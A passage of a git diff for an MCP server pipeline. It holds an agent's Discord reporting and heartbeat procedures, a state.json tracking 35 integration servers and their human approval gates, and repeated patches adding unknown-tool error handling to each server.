Ping Jake if critical + +## Daily Standup Format +Post to #pipeline-standup at 9:00 AM ET: +``` +**MCP PIPELINE STANDUP — [Date]** + +**Overnight Progress:** +• [MCP Name]: Stage X → Stage Y (reason) +• [MCP Name]: BLOCKED — [issue] + +**Pipeline Stats:** +• Total: X | Build: X | Testing: X | Docs: X | Shipped: X | Blocked: X +• Velocity: X stage advances in last 7 days + +**Decisions Waiting:** +• [MCP Name] — [what decision] (posted [when]) + +**Today's Plan:** +• [what I'll work on] +``` + +## Build Log Format +Post to #build-log on every card movement: +``` +[HH:MM] **[MCP Name]** Stage X → Stage Y +> [brief description of what was done] +``` + +## Decision Request Format +Post to #pipeline-decisions: +``` +**DECISION NEEDED** + +**MCP:** [Name] +**Stage:** [Current] → [Proposed next] +**Context:** [What I found / built / recommend] +**Recommendation:** [My take] + +React: ✅ approve | ❌ reject | 💬 discuss +``` + +## Design Review Format +Post to #design-reviews: +``` +**[MOCKUP/SCREENSHOT] REVIEW — [MCP Name]** +**App [X/Y]:** [App Name] + +[Image] + +**Layout:** [description] +**Components:** [list] +**Interactivity:** [what's interactive] + +React: ✅ approve | ✏️ changes needed | ❌ scrap +``` + +## Heartbeat Check (Cron) +Every 60 minutes: +1. Read state.json +2. For each MCP not blocked: + - Can it auto-advance? → Do the work + - Waiting for decision? → Check if Jake reacted (re-ping if >24h) + - In a work stage? → Continue/start the work +3. Write updated state.json +4. Post any movements to #build-log diff --git a/mcp-command-center/index.html b/mcp-command-center/index.html new file mode 100644 index 0000000..925fb36 --- /dev/null +++ b/mcp-command-center/index.html @@ -0,0 +1,1350 @@ + + + + + +MCP Command Center + + + + + + +
+ + + diff --git a/mcp-command-center/state.json b/mcp-command-center/state.json new file mode 100644 index 0000000..1c76122 --- /dev/null +++ b/mcp-command-center/state.json @@ -0,0 +1,121 @@ +{ + "version": 1, + "lastUpdated": "2026-02-05T01:00:00Z", + "updatedBy": "buba-heartbeat", + "phases": [ + { "id": 1, "name": "Discovery & Research", "color": "#3B82F6", "stages": [1,2,3,4] }, + { "id": 2, "name": "Build", "color": "#8B5CF6", "stages": [5,6,7,8] }, + { "id": 3, "name": "Testing & Hardening", "color": "#F59E0B", "stages": [9,10,11,12] }, + { "id": 4, "name": "Documentation & Packaging", "color": "#14B8A6", "stages": [13,14,15] }, + { "id": 5, "name": "Launch & Distribution", "color": "#F43F5E", "stages": [16,17,18] }, + { "id": 6, "name": "Adoption & Feedback", "color": "#10B981", "stages": [19,20,21] }, + { "id": 7, "name": "Monetization & Scale", "color": "#EAB308", "stages": [22,23,24,25] } + ], + "stages": [ + { "id": 1, "name": "Identified", "phase": 1 }, + { "id": 2, "name": "Market Research", "phase": 1 }, + { "id": 3, "name": "API Research", "phase": 1 }, + { "id": 4, "name": "Architecture Designed", "phase": 1 }, + { "id": 5, "name": "Server Scaffolded", "phase": 2 }, + { "id": 6, "name": "Core Tools Built", "phase": 2 }, + { "id": 7, "name": "UI Apps Built", "phase": 2, "gates": ["design-mockup-approval", "final-screenshot-approval"] }, + { "id": 8, "name": "Integration Complete", "phase": 2 }, + { "id": 9, "name": "Local Testing", "phase": 3 }, + { "id": 10, "name": "Edge Case Testing", "phase": 3 }, + { "id": 11, "name": "Host Compatibility Testing", "phase": 3 }, + { "id": 12, "name": "Performance Validated", "phase": 3 }, + { "id": 13, "name": "README Written", "phase": 4 }, + { "id": 14, "name": "Package Prepared", "phase": 4 }, + { "id": 15, "name": "GitHub Repo Published", "phase": 4 }, + { "id": 16, "name": "Registry Listed", "phase": 5 }, + { "id": 17, "name": "Launch Marketing", "phase": 5 }, + { "id": 18, "name": "Content Marketing", 
"phase": 5 }, + { "id": 19, "name": "Early Adopter Feedback", "phase": 6 }, + { "id": 20, "name": "Iteration Cycle", "phase": 6 }, + { "id": 21, "name": "Community Building", "phase": 6 }, + { "id": 22, "name": "Freemium/Pro Strategy", "phase": 7 }, + { "id": 23, "name": "Enterprise Outreach", "phase": 7 }, + { "id": 24, "name": "Enterprise Deals", "phase": 7 }, + { "id": 25, "name": "Raving Fans", "phase": 7 } + ], + "mcps": [ + { "id": "closebot", "name": "CloseBot MCP", "type": "BIG4", "stage": 8, "tools": 119, "apps": 6, "modules": 14, "blocked": false, "blockerNote": "", "notes": "119 tools, 14 modules, 6 UI apps. Compile clean.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "meta-ads", "name": "Meta Ads MCP", "type": "BIG4", "stage": 8, "tools": 55, "apps": 11, "blocked": false, "blockerNote": "", "notes": "~55 tools, 11 categories, 11 UI apps. Compile clean.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "google-console", "name": "Google Console MCP", "type": "BIG4", "stage": 8, "tools": 22, "apps": 5, "blocked": false, "blockerNote": "", "notes": "22 tools, 5 UI apps. Compile clean.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "twilio", "name": "Twilio MCP", "type": "BIG4", "stage": 8, "tools": 54, "apps": 19, "blocked": false, "blockerNote": "", "notes": "54 tools, 19 UI apps. Integrated into LocalBosses.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "ghl", "name": "GoHighLevel MCP", "type": "GHL", "stage": 8, "tools": 240, "apps": 65, "blocked": false, "blockerNote": "", "notes": "65 apps, ~240 tools. 3 review rounds. All builds passing.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "acuity-scheduling", "name": "Acuity Scheduling", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. 
Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "bamboohr", "name": "BambooHR", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "basecamp", "name": "Basecamp", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "bigcommerce", "name": "BigCommerce", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "brevo", "name": "Brevo", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "calendly", "name": "Calendly", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "clickup", "name": "ClickUp", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "close", "name": "Close", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. 
Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "clover", "name": "Clover", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "constant-contact", "name": "Constant Contact", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "fieldedge", "name": "FieldEdge", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "freshbooks", "name": "FreshBooks", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "freshdesk", "name": "FreshDesk", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "gusto", "name": "Gusto", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "helpscout", "name": "HelpScout", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. 
Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "housecall-pro", "name": "Housecall Pro", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "jobber", "name": "Jobber", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "keap", "name": "Keap", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "lightspeed", "name": "Lightspeed", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "mailchimp", "name": "Mailchimp", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "pipedrive", "name": "Pipedrive", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "rippling", "name": "Rippling", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. 
Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "servicetitan", "name": "ServiceTitan", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "squarespace", "name": "Squarespace", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "toast", "name": "Toast", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "touchbistro", "name": "TouchBistro", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "trello", "name": "Trello", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "wave", "name": "Wave", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "wrike", "name": "Wrike", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. 
Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] }, + { "id": "zendesk", "name": "Zendesk", "type": "STD", "stage": 8, "tools": null, "apps": null, "blocked": false, "blockerNote": "", "notes": "Compiled clean. Not tested against live API.", "stageHistory": [{"stage": 8, "entered": "2026-02-03T00:00:00Z"}] } + ], + "decisions": { + "pending": [ + { + "id": "dec-001", + "type": "pipeline-wide", + "stage": "8→9", + "question": "Testing strategy: structural-only vs live API vs hybrid", + "options": { + "A": "Structural test harness → advance to Stage 9", + "B": "Hold at Stage 8 until API keys provided", + "C": "Hybrid — structural → Stage 9, live API gates Stage 10" + }, + "recommendation": "C", + "discordMessageId": "1468773655801757849", + "channel": "pipeline-decisions", + "posted": "2026-02-05T01:00:00Z", + "status": "awaiting-reaction" + } + ], + "history": [] + }, + "discord": { + "guildId": "1458233582404501547", + "categoryId": "1468757930940698675", + "channels": { + "pipeline-decisions": "1468757982140567676", + "design-reviews": "1468757983428083762", + "pipeline-standup": "1468757984384389234", + "build-log": "1468757986422820864", + "blockers": "1468757987412938945", + "mcp-strategy": "1468757988448669829", + "shipped": "1468757989497507870" + } + }, + "config": { + "heartbeatIntervalMinutes": 60, + "maxAutoRetries": 2, + "humanApprovalRequired": [4, 7, 15, 16, 22, 23, 24], + "designApprovalRequired": [7], + "autoAdvanceStages": [1, 2, 3, 5, 6, 8, 9, 10, 11, 12, 13, 14], + "standupTime": "09:00", + "standupTimezone": "America/New_York" + } +} diff --git a/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts b/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts index 0030de0..1476b16 100644 --- a/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts +++ b/mcp-diagrams/mcp-servers/acuity-scheduling/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from 
"@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -261,6 +263,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/bamboohr/src/index.ts b/mcp-diagrams/mcp-servers/bamboohr/src/index.ts index b2fbeb0..2e97ad4 100644 --- a/mcp-diagrams/mcp-servers/bamboohr/src/index.ts +++ b/mcp-diagrams/mcp-servers/bamboohr/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -299,6 +301,12 @@ async function main() { // Handle tool calls server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/basecamp/src/index.ts b/mcp-diagrams/mcp-servers/basecamp/src/index.ts index 4854d41..b600df2 100644 --- a/mcp-diagrams/mcp-servers/basecamp/src/index.ts +++ b/mcp-diagrams/mcp-servers/basecamp/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from 
"@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -290,6 +292,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts b/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts index 2e389cd..5c11adc 100644 --- a/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts +++ b/mcp-diagrams/mcp-servers/bigcommerce/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -391,6 +393,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } + try { const result = await handleTool(client, name, args || {}); return { diff --git a/mcp-diagrams/mcp-servers/brevo/src/index.ts b/mcp-diagrams/mcp-servers/brevo/src/index.ts index e779557..94c4055 100644 --- a/mcp-diagrams/mcp-servers/brevo/src/index.ts +++ b/mcp-diagrams/mcp-servers/brevo/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from 
"@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -370,6 +372,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/calendly/src/index.ts b/mcp-diagrams/mcp-servers/calendly/src/index.ts index c9e4f2e..26ed03f 100644 --- a/mcp-diagrams/mcp-servers/calendly/src/index.ts +++ b/mcp-diagrams/mcp-servers/calendly/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -248,6 +250,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/clickup/src/index.ts b/mcp-diagrams/mcp-servers/clickup/src/index.ts index 687a635..1f8348c 100644 --- a/mcp-diagrams/mcp-servers/clickup/src/index.ts +++ b/mcp-diagrams/mcp-servers/clickup/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from 
"@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -481,6 +483,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/close/src/index.ts b/mcp-diagrams/mcp-servers/close/src/index.ts index b0040b3..13b2d2d 100644 --- a/mcp-diagrams/mcp-servers/close/src/index.ts +++ b/mcp-diagrams/mcp-servers/close/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -453,6 +455,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/clover/src/index.ts b/mcp-diagrams/mcp-servers/clover/src/index.ts index 95c6174..58341da 100644 --- a/mcp-diagrams/mcp-servers/clover/src/index.ts +++ b/mcp-diagrams/mcp-servers/clover/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { 
CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -326,6 +328,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/constant-contact/src/index.ts b/mcp-diagrams/mcp-servers/constant-contact/src/index.ts index b920da1..d282621 100644 --- a/mcp-diagrams/mcp-servers/constant-contact/src/index.ts +++ b/mcp-diagrams/mcp-servers/constant-contact/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -384,6 +386,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/fieldedge/src/index.ts b/mcp-diagrams/mcp-servers/fieldedge/src/index.ts index 885285f..b5bbf0e 100644 --- a/mcp-diagrams/mcp-servers/fieldedge/src/index.ts +++ b/mcp-diagrams/mcp-servers/fieldedge/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { 
CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -368,6 +370,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/freshbooks/src/index.ts b/mcp-diagrams/mcp-servers/freshbooks/src/index.ts index 01928b3..242d424 100644 --- a/mcp-diagrams/mcp-servers/freshbooks/src/index.ts +++ b/mcp-diagrams/mcp-servers/freshbooks/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -421,6 +423,12 @@ async function main() { // Handle tool calls server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/freshdesk/src/index.ts b/mcp-diagrams/mcp-servers/freshdesk/src/index.ts index 527865c..aa1b573 100644 --- a/mcp-diagrams/mcp-servers/freshdesk/src/index.ts +++ b/mcp-diagrams/mcp-servers/freshdesk/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { 
CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -369,6 +371,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/gusto/src/index.ts b/mcp-diagrams/mcp-servers/gusto/src/index.ts index 709f136..fd26747 100644 --- a/mcp-diagrams/mcp-servers/gusto/src/index.ts +++ b/mcp-diagrams/mcp-servers/gusto/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -255,6 +257,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/helpscout/src/index.ts b/mcp-diagrams/mcp-servers/helpscout/src/index.ts index 285b57d..2955222 100644 --- a/mcp-diagrams/mcp-servers/helpscout/src/index.ts +++ b/mcp-diagrams/mcp-servers/helpscout/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, 
ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -310,6 +312,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts b/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts index 0aaf221..85d147c 100644 --- a/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts +++ b/mcp-diagrams/mcp-servers/housecall-pro/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -362,6 +364,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/jobber/src/index.ts b/mcp-diagrams/mcp-servers/jobber/src/index.ts index 7eea1f7..2ecbfb0 100644 --- a/mcp-diagrams/mcp-servers/jobber/src/index.ts +++ b/mcp-diagrams/mcp-servers/jobber/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, 
+ McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -493,6 +495,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/keap/src/index.ts b/mcp-diagrams/mcp-servers/keap/src/index.ts index 01fb7cc..a80015d 100644 --- a/mcp-diagrams/mcp-servers/keap/src/index.ts +++ b/mcp-diagrams/mcp-servers/keap/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -407,6 +409,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool 